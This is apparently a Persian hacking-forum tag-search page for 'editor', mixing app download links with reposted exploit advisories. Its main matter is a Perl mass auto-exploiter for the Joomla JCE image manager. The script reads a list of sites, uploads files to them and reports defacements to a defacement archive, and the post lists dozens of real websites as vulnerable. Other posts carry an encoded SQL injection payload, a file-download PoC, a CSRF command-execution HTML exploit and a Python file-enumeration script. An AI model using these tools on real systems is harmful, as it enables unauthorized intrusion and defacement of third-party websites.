امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'editor'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

13 نتیجه پیدا شد

  1. # Exploit Title : Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army # Vendor Homepage : joomlacontenteditor.net # Software Download Link : joomlacontenteditor.net/downloads / extensions.joomla.org/extension/jce/ # Exploit Risk : High # CWE-264 - [ Permissions, Privileges, and Access Controls ] # CXSecurity [ Author : KingSkrupellos ] : cxsecurity.com/ascii/WLB-2018050200 # Cyberizm : cyberizm.org/cyberizm-joomla-content-editor-jce-auto-mass-exploiter.html ################################################################################# Exploit Title : Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter Google Dork [ Example ] => inurl:''/index.php?option=com_jce'' You can search all plugins and themes to find more sites. Most of them have this plugin JCE installed. [ % 40 or more ] Use your brain. Explanation for Joomla Content Editor JCE => [ ScreenShot ] https://cdn.pbrd.co/images/Hmx6KZC.jpg JCE makes creating and editing Joomla!® content easy... Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS... Office-like functions and familiar buttons make formatting simple Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface Create Links to Categories, Articles, Weblinks and Contacts¹ in your site using a unique and practical Link Browser Easily tab between WYSIWYG, Code and Preview modes. Create Tables, edit Styles, format text and more... Integrated Spellchecking using your browser's Spellchecker Fine-grained control over the editor layout and features with Editor Profiles Media Manager => Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®, Windows Media Player® and HTML 5 Video and Audio. Easily insert Youtube and Vimeo videos - just paste in the URL and Insert! Insert HTML5 Video and Audio with multiple source options Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor Insert multiple images. Create responsive images with the srcset attribute Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension Filemanager => Create links to images, documents, media and other common file types Include a file type icon, file size and modified date Insert as a link or embed the document with an iframe Create downloadable files using the download attribute. Template Manager => Insert pre-defined template content form html or text files Create template snippet files from whole articles or selected content Configure the Template Manager to set the startup content of new articles ################################################################################# Severity: High [ ScreenShot for JCE Editor ] => https://cdn.pbrd.co/images/HmypA0v.png This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening. The component is prone to a the following security vulnerabilities: 1. A cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to the 'search' parameter of the 'administrator/index.php' script. 2. A security-bypass vulnerability occurs due to an error in the 'components/com_jce/editor/extensions/browser/file.php' script. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Affected JCE 2.1.0 is vulnerable; other versions may also be affected. References => https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27481 References => https://www.securityfocus.com/bid/53630 Note : This Joomla JCE is not the previous exploit going to this path => ..../images/stories/......php => NOT This JCE is well-known by some hackers but some hackers do not know about nothing about this vulnerability. So this is the new one. TARGETSİTE/yourfilename.png .gif .jpg or TARGETSİTE/images/yourfilename.html .php .asp .jpg .gif .png ################################################################################# Notes => Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg An Attacker cannot reach this image manager without username and password on the control panel. But there is a little trick to upload a image or a file behind this vulnerability. One Attacker must execute with remote file upload code. Watch Videos from Original Sources => Install JCE Editor in Joomla! 2.5 Tutorial [video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video] Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial [video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video] How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability [video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video] ################################################################################# You can check with this exploit codes on your browser if the sites are vulnerable for testing the security. So you will see some errors. Exploit => ....../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 {"result":{"error":true,"result":""},"error":null} Exploit => ...../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload or giving this error => {"result":null,"error":"No function call specified!"} Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":null,"error":"No function call specified!"} Path => TARGETSİTE/yourfilename.png gif jpg or TARGETSİTE/images/yourfilename.png gif jpg html txt ################################################################################# Auto Mass Exploiter Perl => [code]#!/usr/bin/perl use Term::ANSIColor; use LWP::UserAgent; use HTTP::Request; use HTTP::Request::Common qw(POST); $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"); $ua->timeout (10); system('title JCE Mass Auto Exploiter by KingSkrupellos'); print "JCE Mass Auto Exploiter\n"; print "Coded by KingSkrupellos\n"; print "Cyberizm Digital Security Team\n"; print "Sitelerin Listesi Reyis:"; my $list=<STDIN>; chomp($list); open (THETARGET, "<$list") || die ">>>Web sitesi listesi açılamıyor<<< !"; @TARGETS = <THETARGET>; close THETARGET; $link=$#TARGETS + 1; foreach $site(@TARGETS){ chomp $site; if($site !~ /http:\/\//) { $site = "http://$site/"; }; $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"; print "wait upload $site\n"; $vulnurl=$site.$exploiturl; $res = $ua->get($vulnurl)->content; if ($res =~ m/No function call specified!/i){ open(save, '>>C:\Users\Kullanıcılar\KingSkrupellos\result\list.txt'); print "\n[Uploading]"; my $res = $ua->post($vulnurl, Content_Type => 'form-data', Content => [ 'upload-dir' => './../../', 'upload-overwrite' => 0, 'Filedata' => ["kingskrupellos.png"], 'action' => 'upload' ] )->decoded_content; if ($res =~ m/"error":false/i){ }else{ print " ......... "; print color('bold white'); print "["; print color('reset'); print color('bold green'); print "PATCHED"; print color('reset'); print color('bold white'); print "] \n"; print color('reset'); } $remote = IO::Socket::INET->new( Proto=> PeerAddr=>"$site", PeerPort=> Timeout=> ); $def= "$site/kingskrupellos.png"; print colored ("[+]Basarili",'white on_red'),"\n"; print "$site/kingskrupellos.png\n"; }else{ print colored (">>Exploit Olmadi<<",'white on_blue'),"\n"; } } sub zonpost{ $req = HTTP::Request->new(GET=>$link); $useragent = LWP::UserAgent->new(); $response = $useragent->request($req); $ar = $response->content; if ($ar =~ /Hacked By KingSkrupellos/){ $dmn= $link; $def="KingSkrupellos"; $zn="http://aljyyosh.org/single.php"; $lwp=LWP::UserAgent->new; $res=$lwp -> post($zn,[ 'defacer' => $def, 'domain1' => $dmn, 'hackmode' => '15', 'reason' => '1', 'Gönder' => 'Send', ]); if ($res->content =~ /color="red">(.*)<\/font><\/li>/) { print colored ("[-]Gönder $1",'white on_green'),"\n"; } else { print colored ("[-]Hata",'black on_white'),"\n"; } }else{ print" Zone Alınmadı !! \n"; } }[/code] How to use this code on your operating system like Windows ; Open Start + Go to Search Button + Type + Command Prompt [ Komut İstemi ] => or cmd.exe Or you can use ConEmulator for Windows => https://conemu.github.io => Download it and use it. Create a folder like " jcee " and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt C:/Users/Your-Computer-Name/ cd Desktop cd "jcee" perl yourexploitcodenamejce.pl site.txt Waiting for Upload Exploit Successful or Not Finished # Uploaded File/Image Directory Path => TARGETDOMAIN/yourfilename.png .jpg .gif TARGETDOMAIN/images/yourfilename.png .jpg .gif ################################################################################# Example Vulnerable Sites => aXbcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":{"error":true,"result":""},"error":null} => [ Proof of Concept ] => archive.is/J2eX0 => archive.is/YFanj sXv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} bXuses.co.il/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} irm.edu.vn/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload pigpilot.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload deep-centr.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload wintotal.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload restaurante-chines.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload artlife54.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload litekstent.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload artstairs.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload telltale.co.za/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload zivapodstran.cz/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload littlefolkvisuals.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload practicsa.ro/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload tis.co.th/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload newconcept-cleaning.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload basolatogucciardi.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload finansure.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload kansystem.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload comtec.rs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload esmikom.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload farmacovigilanza-online.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload djgonis.gr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload diktatura.lt/main/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload despachosdigitales.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload gebaeudereinigung-pesch.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload jeddah4arch.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload swmoveisplanejados.com.br/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload psychologie.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload rolsteigerkopen.nl/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload studiocontabilecapuana.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload traversatacarnica.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload arcade-sages-femmes.ch/asf/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload alamoconsulting.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload asociacionchajulense.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload caseyfiliaci.com/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload dermedica.biz/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload custer.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload gimsusz.pl/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload guayab.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload physiotherapie-wenus.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload quintasaojoao.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload ocetehnotrade.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload psxm-tkdm.gr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload confatech.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload jeffcole.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload cabanascamilo.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload thesurelink.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload oddjobthesailor.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload linalux-montlesoie.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload mgsopop.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload pascal-it.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload sicurservice.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload balzamcda.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload diaocsontra.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload juergenlagger.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload johnmcfaddenattorney.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload spacious.com.tw/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload kims-ltd.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload percyparkminis.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload THE END ################################################################################# Discovered By KingSkrupellos from Cyberizm Digital Security Team #################################################################################
  2. Moeein Seven

    Soft-Android

    Photo Lab PRO Picture Editor اپلیکیشن اندرویدی که با امکانات کامل شامل 640 فریم ، افکت و ف/ی/ل/ت/ر جهت ایجاد طرح های جالب و مفرح در عکس ها میباشد. به کمک اپلیکیشن حرفه ای Photo Lab PRO Picture Editor به راحتی قادر خواهید بود که مونتاژ های جالب، نمادهای تصویری بانمک، کاریکاتور های کارتونی، کارت ها و wallpaper جدید خلق نمایید. اپلیکیشن Photo Lab هیچ اثر نامطلوب یا سایه داری در چاپ تصاویر جدید ایجاد نمیکند. ویژگی که بیشترین لذت را از آن خواهید برد، امکان کاریکاتوری کردن عکس هاست که تنها با یک کلیک، قابلیت تغییر چهره شما را به کاریکاتور های خنده دار و جالب دارد! جهت دانلود این نرم افزار برای سیستم عامل اندروید برروی لینک زیر کلیک کنید Photo Lab PRO Picture Editor: effects, blur & art - Apps on Google Play
  3. # # # # # # Exploit Title: Joomla! Component NextGen Editor 2.1.0 - SQL Injection # Dork: N/A # Date: 19.12.2017 # Vendor Homepage: hhttp://nextgeneditor.com/ # Software Link: https://extensions.joomla.org/extension/nextgen-editor/ # Software Download: http://nextgeneditor.com/index.php/en/testcategory/send/2-nge-editor-full/33-nextgeneditor-full-free # Version: 2.1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/index.php?option=com_nge&view=config&plname=[SQL] # # %22%20%20%2f%2a%21%30%37%37%37%37%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%37%37%37%37%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%2800%2c%2f%2a%21%30%37%37%37%37%63%6f%6e%63%61%74%2a%2f%280x27%2c0x496873616e2053656e63616e%2c0x3a%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c0%29%2d%2d%20%2d # # # # # #
  4. Moeein Seven

    soft-Windows

    دانلود این نرم افزار برای ویندوز https://www.microsoft.com/en-us/store/p/photo-editor/9wzdncrfj334
  5. Moeein Seven

    soft-Windows

    https://www.microsoft.com/en-us/store/p/photo-editor-polarr/9nblggh6bgx8
  6. mohammad_ghazei

    soft-Windows

    https://www.microsoft.com/en-us/store/p/xodo-pdf-reader-editor/9wzdncrdjxp4
  7. mohammad_ghazei

    soft-Windows

    https://www.microsoft.com/en-us/store/p/video-editor-master/9nblggh5qb93
  8. mohammad_ghazei

    soft-Windows

    https://www.microsoft.com/en-us/store/p/movie-maker-free-video-editor/9nblggh4wwjr
  9. mohammad_ghazei

    Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  10. Anonyali

    Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  11. پیدا کردن پکیج نیم برنامه با استفاده از apk editor #package ?اول برنامه apk editor باز کنید و روی select apk from app بزنید . ?وقتی وارد صفحه شدید از گوشه بالا میتونید انتخاب کنید که برنامه های سیستمی نمایش داده بشه یا معمولی . ?حالا روی برنامه ای که انتخاب کردید بزنید و روی common edit بزنید و پکیج برنامه رو میبینید .
  12. Moeein Seven

    Hacking

    [+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/RAPID-PHP-EDITOR-REMOTE-CMD-EXEC.txt [+] ISR: Apparition Security Vendor: ====================== www.rapidphpeditor.com Product: =============================== Rapid PHP Editor IDE rapidphp2016.exe v14.1 Rapid PHP editor is a faster and more powerful PHP editor for Windows combining features of a fully-packed PHP IDE with the speed of the Notepad. Rapid PHP is the most complete all-in-one software for coding PHP, HTML, CSS, JavaScript and other web development languages with tools for debugging, validating, reusing, navigating and formatting your code. Vulnerability Type: ============================= CSRF Remote Command Execution CVE Reference: ============== N/A Vulnerability Details: ===================== There is a Remote Command Execution ailment in this IDE, if a user of this IDE is running the internal debug server listening on localhost port 89 and they open a link or visit a malicious webpage then remote attackers can execute arbitrary commands on the victims system. Reference: http://forums.blumentals.net/viewtopic.php?f=15&t=7062 Exploit code(s): ================ Call Windows "calc.exe" as POC <a href="http://127.0.0.1:89/~C/Windows/system32/calc.exe">Click it!</a> OR <form action="http://127.0.0.1:89/~C/Windows/system32/calc.exe" method="post"> <script>document.forms[0].submit()</script> </form> Disclosure Timeline: ============================================= Vendor notification: October 5, 2016 Vendor confirms vulnerability: October 7, 2016 Vendor releases fixed version: November 1, 2016 November 2, 2016 : Public Disclosure Severity Level: ================ High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
  13. Moeein Seven

    Hacking

    [+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DZSOFT-v4.2.7-PHP-EDITOR-FILE-ENUMERATION.txt [+] ISR: ApparitionSec Vendor: ============== www.dzsoft.com Product: ========================= DzSoft PHP Editor v4.2.7 DzSoft PHP Editor is a tool for writing and testing PHP and HTML pages. Vulnerability Type: ==================== File Enumeration CVE Reference: ============== N/A Security Issue: ================ DzSoft comes with a built-in web server used to preview PHP files, the built-in web server is prone to file enumeration attacks when combining "HEAD" method HTTP requests with directory traversal "\../../" type attacks. This can aid attackers in information gathering (File enumeration) to help in possibly furthering attacks. On install DzSoft users get Windows network warning like: "Allow Dzsoft to communicate on these networks:" Private networks, such as my home or work network Public networks, such as those in airports and coffee shops (not recommended). This selection will create Firewall rule and determine remote connections allowed to DzSoft editors built-in server. Then when remote user make HTTP request to DzSoft they will get HTTP 403 Forbidden from the built-in web server. e.g. curl -v "http://VICTIM-IP/\../mysql/data/mysql.pid" < HTTP/1.1 403 Forbidden < Content-Type: text/html < Content-Length: 1554 < <HTML> <HEAD> <TITLE>403 Forbidden</TITLE> </HEAD> <BODY> <!-- ---------------------------------------------------------------------------------------------------- --> <!-- ---------------------------------------------------------------------------------------------------- --> <!-- ---------------------------------------------------------------------------------------------------- --> <!-- ---------------------------------------------------------------------------------------------------- --> <!-- ---------------------------------------------------------------------------------------------------- --> <!-- ---------------------------------------------------------------------------------------------------- --> <!-- ---------------------------------------------------------------------------------------------------- --> <!-- ---------------------------------------------------------------------------------------------------- --> <!-- ---------------------------------------------------------------------------------------------------- --> <!-- ---------------------------------------------------------------------------------------------------- --> <H1>Forbidden</H1> <p>For security reasons, you cannot access the built-in web server of DzSoft PHP Editor from another computer.</p> <p>If you see this message within DzSoft PHP Editor's window, or if you think that there might be reasons to enable access from other computers, </BODY> </HTML> * Connection #0 to host x.x.x.x left intact However, this 403 Forbidden access control can be bypassed by malicious users to "stat" files in and outside the webroot. e.g. mysql directory. File enumeration Conditions: These setting is found under Run / Run Options / Paramaters tab a) DZSoft built-in web server is running b) DZSoft built-in web servers "REMOTE_HOST=x.x.x.x" and "REMOTE_ADDR=x.x.x.x" is set to a real IP other than localhost. For POC create and save a PHP file under XAMPP/htdocs and run DzSoft built-in web server in preview mode. Next make request for "mysql/my-huge.ini" to see if exists. C:\>curl -v -I "http://VICTIM-IP/\../mysql/my-huge.ini" * Trying VICTIM-IP... * Connected to VICTIM-IP (VICTIM-IP) port 80 (#0) > HEAD /\../mysql/my-huge.ini HTTP/1.1 > User-Agent: curl/7.41.0 > Host: VICTIM-IP > Accept: */* > < HTTP/1.1 200 OK HTTP/1.1 200 OK < Content-Type: Content-Type: < Content-Length: 5057 Content-Length: 5057 < Cache-Control: no-cache Cache-Control: no-cache Checking for "mysql.pid" ///////////////////////// C:\>curl -v -I "http://VICTIM-IP/\../mysql/data/mysql.pid" * Trying VICTIM-IP... * Connected to VICTIM-IP (VICTIM-IP) port 80 (#0) > HEAD /\../mysql/data/mysql.pid HTTP/1.1 > User-Agent: curl/7.41.0 > Host: VICTIM-IP > Accept: */* > < HTTP/1.1 200 OK HTTP/1.1 200 OK < Content-Type: Content-Type: < Content-Length: 5 Content-Length: 5 < Cache-Control: no-cache Cache-Control: no-cache < Expires: 0 Checking for "xampp_shell.bat" /////////////////////////////// C:\>curl -v -I "http://VICTIM-IP/\../xampp_shell.bat" * Trying VICTIM-IP... * Connected to VICTIM-IP (VICTIM-IP) port 80 (#0) > HEAD /\../xampp_shell.bat HTTP/1.1 > User-Agent: curl/7.41.0 > Host: VICTIM-IP > Accept: */* > < HTTP/1.1 200 OK HTTP/1.1 200 OK < Content-Type: Content-Type: < Content-Length: 1084 Content-Length: 1084 < Cache-Control: no-cache These also work... [root@localhost local]# wget -S --spider "http://VICTIM-IP:8080/\../mysql/my-huge.ini" --10:26:21-- http://VICTIM-IP:8080/%5C../mysql/my-huge.ini Connecting to VICTIM-IP:8080... connected. HTTP request sent, awaiting response... HTTP/1.0 200 OK Content-Type: Content-Length: 5057 Cache-Control: no-cache Expires: 0 Length: 5057 (4.9K) [] 200 OK [root@localhost local]# wget -S --spider "http://VICTIM-IP:8080/\../mysql/my-innodb-heavy-4G.ini" --10:29:03-- http://VICTIM-IP:8080/%5C../mysql/my-innodb-heavy-4G.ini Connecting to VICTIM-IP:8080... connected. HTTP request sent, awaiting response... HTTP/1.0 200 OK Content-Type: Content-Length: 20906 Cache-Control: no-cache Expires: 0 Length: 20906 (20K) [] 200 OK Tested Windows XAMPP, Linux / curl curl 7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 ////////////////////////////////////////// Next, target files on C:\ Drive. Bypass 401 Forbidden to enumerate a file on C:\ drive named "hi.txt" wget "http://127.0.0.1:8088/c/hi.txt" -c --header="Range: bytes=0" Exploit/POC: ============= In DZSoft PHP Editor 1) Change DzSoft web server options for remote address to IP other than localhost. 2) Create test PHP file deploy under xampp/htdocs or whatever Apache your using. 3) Start DzSofts built-in webserver to preview PHP file Then, import socket print 'DzSoft File Enumeration POC' print 'Hyp3rlinx / ApparitionSec' IP=raw_input("[IP]>") PORT=int(raw_input("[PORT]>")) DEPTH=int(raw_input("[DEPTH]>")) FILE=raw_input("[FILE]>") ENUM="HEAD "+"/\\" ENUM+="../"*DEPTH+FILE+ " HTTP/1.0\r\n\r\n" s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((IP,PORT)) s.send(ENUM) print 'Enumerating file:' print ENUM output = s.recv(128) print output s.close() Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: ================================== Vendor Notification: No reply March 27, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the 